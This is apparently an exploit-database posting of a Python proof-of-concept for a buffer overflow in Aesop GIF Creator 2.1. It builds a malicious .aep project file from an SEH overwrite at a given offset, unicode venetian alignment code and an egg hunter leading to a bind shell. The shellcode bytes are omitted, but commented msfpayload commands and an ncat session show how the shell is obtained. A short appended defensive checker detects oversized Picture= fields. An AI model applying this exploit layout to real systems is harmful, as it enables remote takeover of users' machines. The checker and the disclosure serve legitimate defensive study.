
[local exploits] - Aesop GIF Creator <= v2.1 (.aep) Buffe

Posted on 16 December 2010

========================================================
Aesop GIF Creator <= v2.1 (.aep) Buffer Overflow Exploit
========================================================

#!/usr/bin/python
# Exploit Title: Aesop GIF Creator <= v2.1 (.aep) Buffer Overflow Exploit
# Date: 12/15/2010
# Author: xsploitedsec
# URL: http://www.x-sploited.com/
# Contact: xsploitedsec [at] x-sploited.com
# Software Link: http://www.yukudr.com/_h84561/aesop_setup.exe
# Vulnerable version: <= v2.1
# Tested on: Windows XP SP3 Eng
# CVE : N/A

#### Software Description:
# Aesop is a powerful tool that allows you to create animated GIF images (banners, buttons, labels and headings)
# for your website and even GIF wallpapers for your mobile phone quickly and easily (click to see samples). You
# can use an antialiased 3D-Text, shapes (rectangles, rounded rectangles, ellipses and polygons) and external
# pictures for drawing in your GIF.
# Convenient interface.
# Unicode support - you can use national characters as Text in your GIF.
# An excellent antialiasing technique (blurring the edges between color transitions) to draw 3D-Text and shapes:

#### Exploit information:
# Aesop is prone to a buffer overflow when handling malicious Aesop project files. The vulnerability
# is due to improper bounds checking of the "Picture=" field, which can be exploited by malicious people to
# compromise a user's system.

#### Other information:
# I attempted to reach out to the vendor about this but after a few short emails it became clear that they
# had no interest in verifying it/coordinating a fix so here's the exploit.

#### Notes:
# I always knew that one day I would end up needing to deal with unicode buffers. After a couple nights of
# tinkering around this is the end result. P.S. - When all else fails->Fail harder

#### Shoutz:
# kAoTiX, Sheep, Tu, edb-team, corelan team, packetstormsecurity and all other security researchers and sites.
# -> A big thanks goes to corelanc0d3r for shedding some light on the subject of unicode exploits. ;)

import struct
import sys

about = " ================================================================== "
about += " Title: Aesop GIF Creator <= v2.1 (.aep) Buffer Overflow Exploit PoC "
about += " Author: xsploitedsec URL: http://www.x-sploited.com/ "
about += " Contact: xsploitedsecurity [at] x-sploited.com "
about += "=================================================================="
print about

# root@bt:~# msfpayload windows/shell_bind_tcp lport=4444 lhost=0.0.0.0 EXITFUNC=seh R
# | msfencode -e x86/alpha_upper -c 1 -t c -b '\x1a\x19\x0a' > /tmp/aesop.txt
# [*] x86/alpha_upper succeeded with size 752 (iteration=1)
#
# root@bt:~# ncat 10.0.1.16 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# C:\>
# Unmolested, ASCII shellcode buried in stack ftw!?
bindshell = (
    # [752-byte x86/alpha_upper encoded bind shell payload omitted from this copy]
    ""
)

# unicode encoded, egg="w00t"
egg_hunter = (
    # [unicode-encoded egg hunter payload omitted from this copy]
    ""
)

# aesop project file header
prj_header = (
    "\x5B\x41\x65\x73\x6F\x70\x20\x50\x72\x6F\x6A\x65\x63\x74\x20\x46\x69\x6C"
    "\x65\x20\x76\x2E\x32\x2E\x30\x5D\x0D\x0A\x7B\x50\x69\x63\x74\x75\x72\x65"
    "\x3D"
)

# hunter tag ="w00tw00t"
egg = "\x77\x30\x30\x74\x77\x30\x30\x74"

seh_offset = 669

# Begin payload buffer
payload = "\x41" * seh_offset
# NSEH
payload += "\x61"               # popad
payload += "\x73"               # nopalign/add byte ptr [ebx],dh
# SE handler
payload += "\xB1\x42"           # unicode compatible p/p/r - Aesop.exe (universal)
# Prepare/jump->EAX
payload += "\x73"               # venetian/add byte ptr [ebx],dh
payload += "\x55"               # push ebp
payload += "\x73"               # venetian/add byte ptr [ebx],dh
payload += "\x58"               # pop eax
payload += "\x73"               # venetian/add byte ptr [ebx],dh
payload += "\x05\x19\x11"       # add eax, 0x19002200h
payload += "\x73"               # venetian/add byte ptr [ebx],dh
payload += "\x2d\x11\x11"       # sub eax, 0x12007200h
payload += "\x73"               # venetian/add byte ptr [ebx],dh
payload += "\x50"               # push eax
payload += "\x73"               # add byte ptr [ebx],dh
payload += "\xc3"               # ret
payload += "\x41" * 242         # align egghunter with->(ebp+650)
payload += egg_hunter
payload += "\x41" * 1000        # give shellcode some breathing room
payload += egg
payload += bindshell
payload += "\x44" * (5000 - len(payload))   # junk padding
# End payload buffer

xsploitme = (prj_header + payload)

print("[*] Creating file->xsploited.aep")
try:
    out_file = open("xsploited.aep", 'w')
    out_file.write(xsploitme)
    out_file.close()
    print("[+] xsploited.aep created successfully")
    print("[*] 1. Launch the file or open it via Aesop.exe")
    print("[*] 2. Wait a sec for egghunter and netcat in :)")
    print("[-] Exiting...")
except (IOError):
    print("[!] Error creating file")
    print("[-] Exiting...")

# 1337db.com [2010-12-16]
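As an added defensive example (not part of the original exploit or of Aesop), the checker below parses the `[Aesop Project File v.2.0]` header and the `Picture=` field the advisory identifies as unbounded, and flags project files whose field is oversized, unterminated, or filled with a repeated byte; the 260-byte limit is an assumption (a MAX_PATH-sized path), not a value from the page.

```python
import re

# Header and field name decoded from the exploit's prj_header bytes:
# "[Aesop Project File v.2.0]\r\n{Picture="
AEP_HEADER = b"[Aesop Project File v.2.0]\r\n"
PICTURE_FIELD = b"{Picture="

# Assumption: a legitimate picture path fits in MAX_PATH (260 bytes);
# the real parser's limit is not documented on the page.
MAX_PICTURE_LEN = 260


def check_aep(data, max_len=MAX_PICTURE_LEN):
    """Return a list of findings for an .aep file body; empty means it looks sane."""
    findings = []
    if not data.startswith(AEP_HEADER):
        findings.append("missing or unexpected project header")
        return findings
    body = data[len(AEP_HEADER):]
    idx = body.find(PICTURE_FIELD)
    if idx == -1:
        findings.append("no Picture= field")
        return findings
    value = body[idx + len(PICTURE_FIELD):]
    # A well-formed field ends at the closing brace or a line break; a file
    # that never terminates the field is itself suspicious.
    end = re.search(b"[}\r\n]", value)
    if end is None:
        findings.append("Picture= field is unterminated")
        value_bytes = value
    else:
        value_bytes = value[:end.start()]
    if len(value_bytes) > max_len:
        findings.append("Picture= field is %d bytes (limit %d)" % (len(value_bytes), max_len))
    # Picture values are paths, so control bytes or a long run of one
    # character (the classic overflow filler) are worth flagging too.
    if any(b < 0x20 or b == 0x7F for b in bytearray(value_bytes)):
        findings.append("Picture= field contains control bytes")
    if len(value_bytes) >= 64 and len(set(bytearray(value_bytes))) <= 2:
        findings.append("Picture= field is a long run of a repeated byte")
    return findings


# Constructed samples, not files from the page:
BENIGN_AEP = AEP_HEADER + b"{Picture=C:\\images\\logo.png}\r\n"
OVERSIZED_AEP = AEP_HEADER + PICTURE_FIELD + b"A" * 5000 + b"}\r\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_AEP), ("oversized", OVERSIZED_AEP)):
        print(name, check_aep(sample) or ["ok"])
```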
